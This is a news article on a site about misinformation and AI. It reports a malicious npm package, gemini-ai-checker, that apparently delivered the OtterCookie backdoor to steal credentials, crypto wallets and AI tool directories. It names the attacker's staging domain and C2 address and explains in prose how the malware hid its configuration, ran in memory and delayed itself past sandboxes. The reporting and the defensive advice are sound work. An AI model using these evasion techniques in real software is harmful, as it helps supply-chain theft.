Close Menu
Web StatWeb Stat
  • Home
  • News
  • United Kingdom
  • Misinformation
  • Disinformation
  • AI Fake News
  • False News
  • Guides
Trending

Virginia redistricting flyers spark controversy over alleged misinformation – 13newsnow.com

April 8, 2026

NASA Battles AI Disinformation as Artemis II Sets Moon Milestone

April 8, 2026

Trump vs CNN: POTUS chastises media report on Iranian ‘victory’ in brutal rant, seeks apology; ‘False and dangerous’

April 8, 2026
Facebook X (Twitter) Instagram
Web StatWeb Stat
  • Home
  • News
  • United Kingdom
  • Misinformation
  • Disinformation
  • AI Fake News
  • False News
  • Guides
Subscribe
Web StatWeb Stat
Home»AI Fake News
AI Fake News

Hackers Use Fake Gemini npm Package to Steal Tokens From Claude, Cursor, and Other AI Tools

News RoomBy News RoomApril 7, 2026Updated:April 8, 20268 Mins Read
Facebook Twitter Pinterest WhatsApp Telegram Email LinkedIn Tumblr

The Shadow Play in Our Digital Backyard: How AI Developers Became the Unwitting Targets of a Sneaky Cyber Attack

Imagine you’re a builder, meticulously crafting something new and innovative, using the best tools available. You trust these tools because, well, they’re part of your craft. Now, imagine a seemingly helpful new tool appears on your workbench. It looks legitimate, promises to streamline a common task, and comes from what appears to be a reputable source. You install it, excited to boost your productivity. What you don’t know is that this “tool” is a Trojan horse, designed to quietly ransack your entire workspace, stealing your blueprints, your private conversations, and the very keys to your digital kingdom. This isn’t a scene from a spy movie; it’s the real-world scenario that unfolded on March 20, 2026, when a malicious npm package called gemini-ai-checker was unleashed, targeting the very heart of the AI development community.

This wasn’t just any cyberattack; it was a sophisticated operation aimed squarely at the people shaping the future of artificial intelligence. The attacker, operating under the deceptive guise of gemini-check, published a package that looked like a simple utility to verify Google Gemini AI tokens. It was a wolf in sheep’s clothing, meticulously designed to appear harmless and helpful. The package’s README even cleverly copied portions of a legitimate JavaScript library, chai-await-async, to boost its credibility. This was a classic tactic to lull developers into a false sense of security, assuming that if some parts looked familiar and trustworthy, the whole package must be. But for the keen-eyed, this was a red flag – why would a “Gemini AI checker” borrow text from an unrelated testing library? Sadly, in the fast-paced world of development, where convenience often trumps scrutiny, many developers likely overlooked this subtle but critical discrepancy.

Once installed, the true nature of the gemini-ai-checker began to unfold. Without a whisper, it connected to a staging server hosted on Vercel, a popular cloud platform, operating under the innocuous-sounding address server-check-genimi.vercel.app. From this clandestine location, it downloaded and executed a JavaScript payload directly onto the victim’s machine. This is where the plot thickened. Analysts from Cyber and Ramen, digital detectives in the cyber world, quickly recognized the payload. It was OtterCookie, a notorious JavaScript backdoor, and its fingerprints were unmistakable. OtterCookie is a weapon frequently wielded by the “Contagious Interview” campaign, an operation that has been firmly linked to North Korean (DPRK) threat actors. This wasn’t a random act of digital vandalism; it was a calculated move by a state-sponsored entity, deploying a proven tool for intelligence gathering. The version of OtterCookie discovered in this attack was almost identical to a variant Microsoft had documented just months prior, a variant that had been actively pilfering data since October 2025. This revealed a long-standing, persistent threat, now adapting its tactics to exploit the booming world of AI.

The plot didn’t stop with gemini-ai-checker. The same cunning attacker also maintained two other npm packages: express-flowlimit and chai-extensions-extras. What tied these disparate packages together was their shared infrastructure, all pointing back to the same Vercel servers. By the time this insidious activity came to light, these three packages combined had amassed over 500 downloads. Even after gemini-ai-checker was promptly removed just before April Fool’s Day in 2026 – a darkly ironic timing – the other two continued to operate, silently gathering victims and data. What made this particular campaign so alarming, and so distinct, was its laser focus on AI developer tools. This wasn’t merely a scattershot attempt to steal generic credentials or cryptocurrency. This malware was precisely engineered to dig into the digital nooks and crannies of AI development environments. It targeted specific directories used by popular tools like Cursor, Claude, Windsurf, PearAI, Gemini CLI, and Eigent AI. This meant the attackers weren’t just stealing passwords; they were aiming for the crown jewels: developer API keys – the digital keys to various AI services, conversation logs – potentially revealing proprietary information or sensitive research, and source code – the intellectual property at the heart of AI innovation. The intent was clear: to compromise the very foundations upon which new AI technologies are built.

The infection mechanism itself was a masterclass in stealth, designed to evade detection at every turn. The gemini-ai-checker package, though purporting to be a simple utility, was surprisingly large, clocking in at 271KB spread across 44 files and listing four dependencies. This was far more substantial than a genuine token checker, but this bulk was a deliberate design choice. It was structured to mimic a legitimate, modern project, even boasting a SECURITY markdown file. This file was a carefully placed piece of window dressing, designed to enhance the package’s perceived trustworthiness and authenticity, making it less likely for a vigilant developer to question its contents. Deeper within the package, the file libconfig.js was a testament to the attacker’s sophistication. Instead of storing a complete, easily scannable URL for its command-and-control (C2) server, it cleverly fragmented the C2 configuration – things like the staging domain, authentication token, path, and bearer token – into separate variables. This fragmentation was a deliberate strategy to break up any easily detectable strings, effectively rendering traditional scanning tools blind to the malicious intent.

When a developer installed the package, another file, libcaller.js, sprang to life. It meticulously reassembled these fragmented pieces of information and, like a digital whisper, sent an HTTP GET request to the Vercel endpoint. To ensure success, it was programmed to retry up to five times, relentlessly attempting to establish contact until a valid response was received. But even then, the attacker had contingencies. If the server responded with a 404 error but the response still contained a specific “token” field, the payload didn’t write itself to disk – a common giveaway for security software. Instead, it was executed directly in memory using Function.constructor. This was a highly deliberate choice, designed to bypass static analysis tools that are specifically trained to flag the eval function, a more traditionally detectable method of code execution. Because nothing was written to disk, and the execution method was carefully chosen, this made the attack profoundly difficult for conventional security tools to detect. It was like a ghost in the machine, leaving no physical trace.

Once the payload was decoded, its complex architecture was revealed: a four-module system, each operating as a separate Node.js process and connecting to the C2 server at 216.126.237.71 across dedicated ports. Imagine a specialized team of digital burglars, each with a distinct role. Module 0 was the stealthiest, establishing remote access through Socket.IO, opening a hidden backdoor for the attackers to come and go as they pleased. Module 1 was the digital pickpocket, targeting browser databases to steal login credentials and eyeing over 25 cryptocurrency wallets, including popular ones like MetaMask and Exodus – a significant haul for any attacker. Module 2 was the digital scavenger, sweeping the victim’s home directory for sensitive file types and, crucially, explicitly enumerating those specialized AI tool directories we mentioned earlier. This wasn’t a general search; it was a targeted hunt for the specific data central to AI development. Finally, Module 3 acted as a constant surveillance agent, monitoring the clipboard every 500 milliseconds for any copied data, and cleverly employing a 3,000-millisecond startup delay to slip past sandbox detection — a digital “wait-and-see” to avoid immediate scrutiny.

For all of us who rely on or contribute to the digital world, this attack serves as a stark reminder. Defenders, or those of us responsible for securing digital infrastructure, should be actively blocking or closely monitoring all outbound connections to Vercel, especially from development environments. Microsoft has even published specific KQL queries, powerful search commands, to help detect suspicious Node.js process behavior, and these should be a mandatory part of any security team’s arsenal. But the responsibility doesn’t lie solely with security professionals. Developers, the very lifeblood of innovation, must cultivate a heightened sense of vigilance. Before integrating any new npm package, no matter how appealing, a thorough verification of its contents is paramount. Scrutinizing README documentation for mismatches with package names, or any other inconsistencies, is a basic but critical step. And perhaps most importantly, developers must elevate the security of their AI tool directories – folders like .cursor and .claude – to the same level of sensitivity and protection as their .ssh or .aws directories. These folders increasingly hold equally sensitive, if not more valuable, intellectual property. Finally, the strength of the community lies in collective action. Promptly reporting any newly published packages that attempt to spoof well-known brands is crucial. By acting quickly and collaboratively, we can help the broader development community respond to these threats before they inflict further damage, ensuring that the builders of our AI future can work in a truly secure environment.

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
News Room
  • Website

Keep Reading

AI prank using fake crime videos triggers real police responses in Florida – WFTV

AI supercharging online scams as regulator ASIC takes down almost 12,000 sites in a year

AI used for propaganda war in Assam polls 2026

Sakana AI Tackles SNS Disinformation

Deep Fake Nine: Why some believe Artemis II mission is hoax

MAGA stars roasted online for sharing AI-generated photo of airman after Iran rescue mission

Editors Picks

NASA Battles AI Disinformation as Artemis II Sets Moon Milestone

April 8, 2026

Trump vs CNN: POTUS chastises media report on Iranian ‘victory’ in brutal rant, seeks apology; ‘False and dangerous’

April 8, 2026

AI-Generated Misinformation Reaches Unprecedented Levels Amid U.S.-Israel-Iran Conflict

April 8, 2026

Refugee charity cleared by regulator after MP-backed ‘misinformation campaign’

April 8, 2026

Azerbaijan, Kazakhstan discuss media cooperation and fight against disinformation

April 8, 2026

Latest Articles

Can AI Labels on Social Media Rebuild Trust?

April 8, 2026

bne IntelliNews – Argentina revokes press credentials amid probe into alleged Russian disinformation network

April 8, 2026

‘False and not based in fact’: Amazon pushes back on reports of another round of layoffs in May |

April 8, 2026

Subscribe to News

Get the latest news and updates directly to your inbox.

Facebook X (Twitter) Pinterest TikTok Instagram
Copyright © 2026 Web Stat. All Rights Reserved.
  • Privacy Policy
  • Terms
  • Contact

Type above and press Enter to search. Press Esc to cancel.